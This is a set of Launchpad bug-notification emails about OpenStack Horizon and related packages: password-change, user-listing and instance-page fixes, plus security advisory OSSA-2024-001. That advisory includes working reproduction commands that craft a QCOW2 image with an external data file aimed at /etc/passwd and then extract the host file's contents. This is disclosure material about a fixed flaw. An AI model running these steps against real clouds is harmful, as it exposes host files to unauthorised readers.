horizon (4:24.0.0-0ubuntu3) oracular; urgency=medium

  * d/u/_styles.scss: use static_url variable instead of absolute path
    (LP: #2067632).

horizon (4:24.0.0-0ubuntu2) oracular; urgency=medium

  [ Rodrigo Barbieri ]
  * d/p/lp1728031.patch: Fix admin unable to reset user's password.
    (LP: #1728031)

  [ Zhang Hua ]
  * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context
    is set. (LP: #2054799)

** Changed in: cloud-archive
   Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1728031

Title:
  [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is
  True

Status in Ubuntu Cloud Archive: Fix Released
Status in Ubuntu Cloud Archive antelope series: Fix Released
Status in Ubuntu Cloud Archive bobcat series: Fix Released
Status in Ubuntu Cloud Archive yoga series: Fix Released
Status in Ubuntu Cloud Archive zed series: Won't Fix
Status in OpenStack Dashboard (Horizon): Fix Released
Status in horizon package in Ubuntu: Fix Released
Status in horizon source package in Jammy: Fix Released
Status in horizon source package in Mantic: Fix Released
Status in horizon source package in Noble: Fix Released
Status in horizon source package in Oracular: Fix Released

Bug description:
  After following the security hardening guidelines:
  https://docs.openstack.org/security-guide/dashboard/checklist.html#check-dashboard-09-is-enforce-password-check-set-to-true

  After the check "Check-Dashboard-09: Is ENFORCE_PASSWORD_CHECK set to
  True" is enabled, the user password cannot be changed. The form
  submission fails, displaying that the admin password is incorrect.

  The reason for this is in openstack_dashboard/api/keystone.py: the
  user_verify_admin_password method uses the internal URL to communicate
  with Keystone.

    line 500: endpoint = _get_endpoint_url(request, 'internalURL')

  This should be changed to adminURL.

  === SRU Description ===

  [Impact]
  Admins cannot change a user's password, as it gives an error saying
  that the admin's password is incorrect, despite being correct. There
  are 2 causes:

  1) Due to the lack of user_domain being specified when validating the
     admin's password, it will always fail if the admin is not registered
     in the "default" domain, because the user_domain defaults to
     "default" when not specified.
  2) Even if the admin user is registered in the "default" domain, it may
     fail due to the wrong endpoint being used in the request to validate
     the admin's password.
  The issues are fixed in 2 separate patches [1] and [2]. However, [2]
  introduces a new config option, while [1] alone is also enough to fix
  the occurrence on some deployments. We are including only [1] in the
  SRU.

  [Test Plan]

  Part 1/2) Test case
  1. Set up the env, ensuring ENFORCE_PASSWORD_CHECK is set to True.
     1a. Deploy an OpenStack env with horizon/openstack-dashboard.
     1b. Set up an admin user in a domain not named "default", such as
         "admin_domain".
     1c. Set up any other user, such as demo, preferably in admin_domain
         as well for convenience.
  2. Reproduce the bug.
     2a. Log in as admin and navigate to Identity > Users.
     2b. On the far right-hand side of the demo user row, click the
         options button and select Change Password.
     2c. Type in any new password, repeat it below, and type in the admin
         password. Click Save and you should see the message "The admin
         password is incorrect".
  3. Install the package that contains the fixed code.
  4. Confirm the fix.
     4a. Repeat steps 2a-2c.
     4b. The password should now be saved successfully.

  Part 2/2) Expected failures
  Check that password changes will continue to fail in scenarios where
  they are expected to fail, such as:
  - admin password incorrect
  - user not authorized cases (comment #35)

  [Where problems could occur]
  The code is a 1-line change that was tested in upstream CI (without the
  addition of bug-specific functional tests) from master (Caracal) to
  stable/zed without any issue captured. No side effects or risks are
  foreseen. Usage of fix [1] has also been tested manually without fix
  [2] and still worked. Worst case scenario, the ability to change
  password that currently does not work will
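Cause (1) above can be shown with a toy model (entirely hypothetical names and data; the real code builds a keystone client session inside Horizon's user_verify_admin_password): when the verification call omits user_domain, the lookup silently falls back to "default", so an admin registered in any other domain fails even with the correct password:

```python
from typing import Optional

# Toy model of the user_domain pitfall behind cause (1); not Horizon code.
USERS = {
    # (name, domain) -> password
    ("admin", "admin_domain"): "s3cret",
}

def verify_admin_password(name: str, password: str,
                          user_domain: Optional[str] = None) -> bool:
    # Keystone treats a missing user domain as "default", so the lookup
    # misses admins registered in any other domain.
    domain = user_domain or "default"
    return USERS.get((name, domain)) == password
```

Passing the admin's actual domain, which is what fix [1] effectively ensures, makes the same credentials verify successfully.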
[Yahoo-eng-team] [Bug 2054799] Re: [SRU] Issue with Project administration at Cloud Admin level
This bug was fixed in the package horizon -
4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0

---
horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0) noble-dalmatian; urgency=medium

  * New upstream release for the Ubuntu Cloud Archive.

horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1) oracular; urgency=medium

  * New upstream snapshot for OpenStack Dalmatian:
    - Refresh xstatic assets.
    - d/p/lp1728031.patch: removed, patch was merged to upstream.
    - d/p/lp2054799.patch: removed, patch was merged to upstream.

horizon (4:24.0.0-0ubuntu3) oracular; urgency=medium

  * d/u/_styles.scss: use static_url variable instead of absolute path
    (LP: #2067632).

horizon (4:24.0.0-0ubuntu2) oracular; urgency=medium

  [ Rodrigo Barbieri ]
  * d/p/lp1728031.patch: Fix admin unable to reset user's password.
    (LP: #1728031)

  [ Zhang Hua ]
  * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context
    is set. (LP: #2054799)

** Changed in: cloud-archive
   Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below === We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 
2, Prepare some test data (e.g. one domain k8s, one project k8s, and one user k8s-admin with the role k8s-admin-role):

openstack domain create k8s
openstack role create k8s-admin-role
openstack project create --domain k8s k8s
openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin
openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role

$ openstack role assignment list --project k8s --names
+----------------+---------------+-------+---------+--------+--------+-----------+
| Role           | User          | Group | Project | Domain | System | Inherited |
+----------------+---------------+-------+---------+--------+--------+-----------+
| k8s-admin-role | k8s-admin@k8s |       | k8s@k8s |        |        | False     |
+----------------+---------------+-------+---------+--------+--------+-----------+

3, Log in to the horizon dashboard with the admin user (e.g. admin/openstack/admin_domain).
4, Click 'Identity -> Domains' to set the domain context to the domain 'k8s'.
5, Click 'Identity -> Project -> k8s project -> Users'.
6, This is the result; it says 'Unable to display the users of this project' - https://i.imgur.com/TminwUy.png
7, These are some logs:

==> /var/log/apache2/error.log <==
[Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11'

==> /var/log/apache2/ssl_access.log <==
10.5.3.120 - - [23/Feb/2024:10:03:11 +] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

[Some Analyses] This action calls this function in horizon [1]. The function first gets a list of users
[Yahoo-eng-team] [Bug 2054799] Re: [SRU] Issue with Project administration at Cloud Admin level
** Changed in: cloud-archive Status: Fix Released => Fix Committed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Committed Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below === We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 
2, Prepare some test data (e.g. one domain k8s, one project k8s, and one user k8s-admin with the role k8s-admin-role):

openstack domain create k8s
openstack role create k8s-admin-role
openstack project create --domain k8s k8s
openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin
openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role

$ openstack role assignment list --project k8s --names
+----------------+---------------+-------+---------+--------+--------+-----------+
| Role           | User          | Group | Project | Domain | System | Inherited |
+----------------+---------------+-------+---------+--------+--------+-----------+
| k8s-admin-role | k8s-admin@k8s |       | k8s@k8s |        |        | False     |
+----------------+---------------+-------+---------+--------+--------+-----------+

3, Log in to the horizon dashboard with the admin user (e.g. admin/openstack/admin_domain).
4, Click 'Identity -> Domains' to set the domain context to the domain 'k8s'.
5, Click 'Identity -> Project -> k8s project -> Users'.
6, This is the result; it says 'Unable to display the users of this project' - https://i.imgur.com/TminwUy.png
7, These are some logs:

==> /var/log/apache2/error.log <==
[Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11'

==> /var/log/apache2/ssl_access.log <==
10.5.3.120 - - [23/Feb/2024:10:03:11 +] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

[Some Analyses] This action calls this function in horizon [1]. The function first gets a list of users (api.keystone.user_list) [2], then the role assignment list (api.keystone.get_project_users_roles) [3]. Without a domain context set, this works fine. However, with a domain context set, the project displayed is in a different domain.
The user list from [2] only contains users of the requesting user's own domain, while the role assignment list [3] includes users from another domain, since the project is in another domain. From horizon's debug log, here is an example of the user list: {"users": [{"email": "juju@localhost", "id": "8cd8f92ac2f94149a91488ad66f02382", "name": "admin", "domain_id": "103a4eb1712f4eb9873240d5a7f66599", "enabled": true, "password_expires_at": null, "options": {}, "links": {"self": "https://192.168.1.59:5000/v3/users/8cd8f92ac2f94149a91488ad66f02382"}}], "links": {"next": null, "self": "https://192.168.1.59:5000/v3/users", "previous": null}} Here is an example of the role assignment list: {"role_assignments": [{"links": {"assignment": "https://192.168.1.59:5000/v3/pro
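The failure mode described above can be sketched as a toy example (helper and field names are illustrative, not horizon's actual code): role assignments reference user IDs from another domain, so a lookup into the domain-scoped user list fails with a bare user ID, much like the "Recoverable error" in the log. The optional fetch_user callback stands in for one plausible remedy of fetching missing users individually.

```python
# Toy illustration of matching role assignments against a domain-scoped
# user list. Names are hypothetical; only the failure shape mirrors the bug.
def match_users_to_roles(users, assignments, fetch_user=None):
    by_id = {u["id"]: u for u in users}
    rows = []
    for a in assignments:
        uid = a["user_id"]
        if uid not in by_id:
            if fetch_user is None:
                # What the unpatched path hits: an ID with no matching user.
                raise KeyError(uid)
            by_id[uid] = fetch_user(uid)  # fetch the cross-domain user
        rows.append((by_id[uid]["name"], a["role"]))
    return rows
```

With a fetch_user callback supplied, the cross-domain assignment resolves instead of aborting the whole table.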
[Yahoo-eng-team] [Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
** Changed in: cloud-archive Status: Fix Released => Fix Committed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to Glance. https://bugs.launchpad.net/bugs/2059809 Title: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498) Status in Cinder: Fix Released Status in Ubuntu Cloud Archive: Fix Committed Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Glance: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Security Advisory: Fix Released Bug description: OpenStack has a security vulnerability in Nova or Glance that allows an authenticated attacker to read arbitrary files. QCOW2 has two mechanisms to read from another file: a backing file and an external data file. The backing-file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered at the time.

Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G`, with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:

Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0

Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and log in to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
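The attack hinges on the qcow2 header advertising an external data file, whose filename is attacker-controlled. A minimal sketch of the kind of image inspection a defense needs, assuming the qcow2 v3 header layout from the QEMU image-format specification (magic at offset 0, version at offset 4, 64-bit incompatible-features field at offset 72, external-data-file bit = bit 2); the function name is illustrative, not the actual Nova/Glance/Cinder check:

```python
import struct

QCOW2_MAGIC = 0x514649FB          # the bytes "QFI\xfb", big-endian
EXTERNAL_DATA_FILE_BIT = 1 << 2   # incompatible-features bit 2 (qcow2 spec)

def has_external_data_file(header: bytes) -> bool:
    """Return True if a qcow2 v3 header sets the external-data-file bit."""
    magic, version = struct.unpack_from(">II", header, 0)
    if magic != QCOW2_MAGIC or version < 3:
        return False              # v2 headers carry no feature bit fields
    (incompatible,) = struct.unpack_from(">Q", header, 72)
    return bool(incompatible & EXTERNAL_DATA_FILE_BIT)
```

An image whose header trips this check should be rejected at upload/import time rather than handed to qemu.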
[Yahoo-eng-team] [Bug 1728031] Re: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True
This bug was fixed in the package horizon - 4:23.2.0-0ubuntu2~cloud0 --- horizon (4:23.2.0-0ubuntu2~cloud0) jammy-antelope; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) * d/p/lp2055409.patch: apply config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to the instance details page (LP: #2055409) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1728031 Title: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: After following the security hardening guidelines: https://docs.openstack.org/security-guide/dashboard/checklist.html#check-dashboard-09-is-enforce-password-check-set-to-true After this check is enabled Check-Dashboard-09: Is ENFORCE_PASSWORD_CHECK set to True The user password cannot be changed. The form submission fails by displaying that admin password is incorrect. The reason for this is in keystone.py in openstack_dashboard/api/keystone.py user_verify_admin_password method uses internal url to communicate with the keystone. 
line 500: endpoint = _get_endpoint_url(request, 'internalURL') This should be changed to adminURL === SRU Description === [Impact] Admins cannot change user's password as it gives an error saying that the admin's password is incorrect, despite being correct. There are 2 causes: 1) due to the lack of user_domain being specified when validating the admin's password, it will always fail if the admin is not registered in the "default" domain, because the user_domain defaults to "default" when not specified. 2) even if the admin user is registered in the "default" domain, it may fail due to the wrong endpoint being used in the request to validate the admin's password. The issues are fixed in 2 separate patches [1] and [2]. However, [2] is introducing a new config option, while [1] alone is also enough to fix the occurrence on some deployments. We are including only [1] in the SRU. [Test Plan] Part 1/2) Test case 1. Setting up the env, ensure ENFORCE_PASSWORD_CHECK is set to True 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Set up admin user in a domain not named "default", such as "admin_domain". 1c. Set up any other user, such as demo. Preferably in the admin_domain as well for convenience. 2. Reproduce the bug 2a. Login as admin and navigate to Identity > Users 2b. On the far right-hand side of the demo user row, click the options button and select Change Password 2c. Type in any new password, repeat it below, and type in the admin password. Click Save and you should see a message "The admin password is incorrect" 3. Install package that contains the fixed code 4. Confirm fix 5a. Repeat steps 2a-2c 5b. 
The password should now be saved successfully Part 2/2) Expected failures Check that password changes will continue to fail in scenarios where it is expected to fail, such as: - admin password incorrect - user not authorized cases (comment #35) [Where problems could occur] The code is a 1-line change that was tested in upstream CI (without the addition of bug-specific functional tests) from master(Caracal) to stable/zed without any issue captured. No side effects or risks are foreseen. Usage of fix [1] has also been tested manually without fix [2] and still worked. Worst case scenario, the ability to change password that currently does not work will still not work, because the code change is isolated to the specific function that validates the authenticity of the password used. Regressions would likely manifest when trying to change user passwords. [Other Info] None. [1] https://review.opendev.org/c/openstack/horizon/+/913250 [2] https://review.opendev.org/c/openstack/horizon/+/844574 To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1728031/+subscriptions -- Mail
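Cause (1) above can be sketched with a hypothetical helper (not horizon's code): when no user domain accompanies the password-validation request, keystone falls back to "default", so an admin registered in e.g. "admin_domain" can never validate their own password.

```python
# Hedged sketch of fix [1]'s essence: carry the admin's actual domain
# through to the validation request instead of letting keystone assume
# "default". Function and parameter names are hypothetical.
def build_password_check_auth(auth_url, username, password, user_domain=None):
    return {
        "auth_url": auth_url,
        "username": username,
        "password": password,
        # Before the fix this key was effectively absent, so validation
        # failed for any admin outside the "default" domain.
        "user_domain_name": user_domain or "default",
    }
```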
[Yahoo-eng-team] [Bug 2054799] Re: [SRU] Issue with Project administration at Cloud Admin level
This bug was fixed in the package horizon - 4:23.2.0-0ubuntu2~cloud0 --- horizon (4:23.2.0-0ubuntu2~cloud0) jammy-antelope; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) * d/p/lp2055409.patch: apply config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to the instance details page (LP: #2055409) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. 
[Others] Original Bug Description Below ===

We are not able to see the list of users assigned to a project in Horizon.

Scenario:
- Log in as Cloud Admin
- Set Domain Context (k8s)
- Go to projects section
- Click on project Permissions_Roles_Test
- Go to Users

Expectation: Get a table with the users assigned to this project.
Result: Get an error - https://i.imgur.com/TminwUy.png [attached]

[Test steps]
1, Create an ordinary openstack test env with horizon.
2, Prepare some test data (e.g. one domain k8s, one project k8s, and one user k8s-admin with the role k8s-admin-role):

openstack domain create k8s
openstack role create k8s-admin-role
openstack project create --domain k8s k8s
openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin
openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role

$ openstack role assignment list --project k8s --names
+----------------+---------------+-------+---------+--------+--------+-----------+
| Role           | User          | Group | Project | Domain | System | Inherited |
+----------------+---------------+-------+---------+--------+--------+-----------+
| k8s-admin-role | k8s-admin@k8s |       | k8s@k8s |        |        | False     |
+----------------+---------------+-------+---------+--------+--------+-----------+

3, Log in to the horizon dashboard with the admin user (e.g. admin/openstack/admin_domain).
4, Click 'Identity -> Domains' to set the domain context to the domain 'k8s'.
5, Click 'Identity -> Project -> k8s project -> Users'.
6, This is the result; it says 'Unable to display the users of this project' - https://i.imgur.com/TminwUy.png
7, These are some logs:

==> /var/log/apache2/error.log <==
[Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11'

==> /var/log/apache2/ssl_access.log <==
10.5.3.120 - - [23/Feb/2024:10:03:11 +] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

[Some Analyses] This action calls this function in horizon [1]. The function first gets a list of users (api.keystone.user_list) [2], then the role assignment list (api.keystone.get_project_users_roles) [3]. Without a domain context set, this works fine. However, with a domain context set, the project displayed is in a different domain. The user list from [2] only contains users of the requesting user's own domain, while the role assignment list [3] includes users from another domain, since the project is in another domain. From horizon's debug log, here is an example of user list
[Yahoo-eng-team] [Bug 2055409] Re: [SRU] config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES does not apply to instance detail page
This bug was fixed in the package horizon - 4:23.2.0-0ubuntu2~cloud0 --- horizon (4:23.2.0-0ubuntu2~cloud0) jammy-antelope; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) * d/p/lp2055409.patch: apply config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to the instance details page (LP: #2055409) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2055409 Title: [SRU] config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES does not apply to instance detail page Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Won't Fix Status in Ubuntu Cloud Archive wallaby series: Won't Fix Status in Ubuntu Cloud Archive xena series: Won't Fix Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Committed Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Focal: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: Setting the config option OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to False successfully allows skipping neutron calls when loading the instance list page, therefore speeding up page loading. 
However, when clicking on an instance and loading the instance details page it still makes the neutron calls, taking a very long time. The usage of the config option in the code could be adjusted to also be used when loading the instance details page, thus speeding up the page loading there as well. === SRU Description === [Impact] Environments that have too many neutron (networking) ports are very slow to load the instance list and instance detail pages. The existing config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES [1] can be set to False for not retrieving/displaying IP addresses (which requires the expensive/slow calls for neutron port list). That does speed up the loading of the _instance list_ page, but it's not applied to the _single instance_ detail page, which remains slow. By applying the config option when loading the instance detail page as well, we speed up instance detail page loading and we have minimal side effects / behavior changes, which are already the same seen when displaying the instance list anyway (see [1]): - IP addresses are not included in the detail page   (this is aligned with the option's desired goal). - Floating IP addresses (if used/available in the deployment)   may take a while to be visible, but a page reload helps [1]   (and users were already be subject to this in the list page):   """   Note that when disabling the query to neutron it takes some time   until associated floating IPs are visible in the project instance   table and users may reload the table to check them.   """ This admittedly introduces a behavior change, however in this case it seems arguably reasonable/acceptable for some reasons: - The _default behavior_ does not change, as the new change   is gated by the opt-in setting of config option to False. 
- The _opt-in behavior_ change (once option is set to False)   is aligned with the _existing_ behavior/goal of that option   (i.e., not to retrieve/display IP addresses _somewhere_,   just _extending_ it from instance _list_ to _details_ too). - Users opt into that option for it _to address the issue_   of slowness in Horizon when looking at instances (VMs),   but it actually _does not address it_ fully -- i.e., one   page (list) is addressed, but the other (details) is not.   This patch/change improves the behavior/does achieve the   intended goal (address slowness) in the details page too. - This change is already present in upstream and Noble LTS,   so users would eventually get to it during cloud upgrades. [Test case] 1. Setting up the env 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Declare and set OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to False in /etc/openstack-dashboard/local_settings.py and restart apache2 2. Prepare to re
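The gating behavior described above can be sketched with hypothetical helper names (the real change lives in horizon's instance views): the expensive neutron lookups run only when the setting keeps its default of True, and after the patch the same gate applies to the detail page as well as the list page.

```python
# Sketch of opt-in gating: skip the slow neutron address lookups when
# OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES is explicitly set to False.
# instance_detail_context and fetch_addresses are illustrative names.
def instance_detail_context(instance, settings, fetch_addresses):
    ctx = {"instance": instance}
    if settings.get("OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES", True):
        ctx["addresses"] = fetch_addresses(instance)  # expensive neutron calls
    return ctx
```

The default behavior is unchanged; only deployments that opt in with False skip the lookup, matching what the list page already did.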
[Yahoo-eng-team] [Bug 2008943] Please test proposed package
Hello Miro, or anyone else affected, Accepted neutron into wallaby-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:wallaby-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-wallaby-needed to verification-wallaby-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-wallaby-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/wallaby Status: Fix Released => Fix Committed ** Tags added: verification-wallaby-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
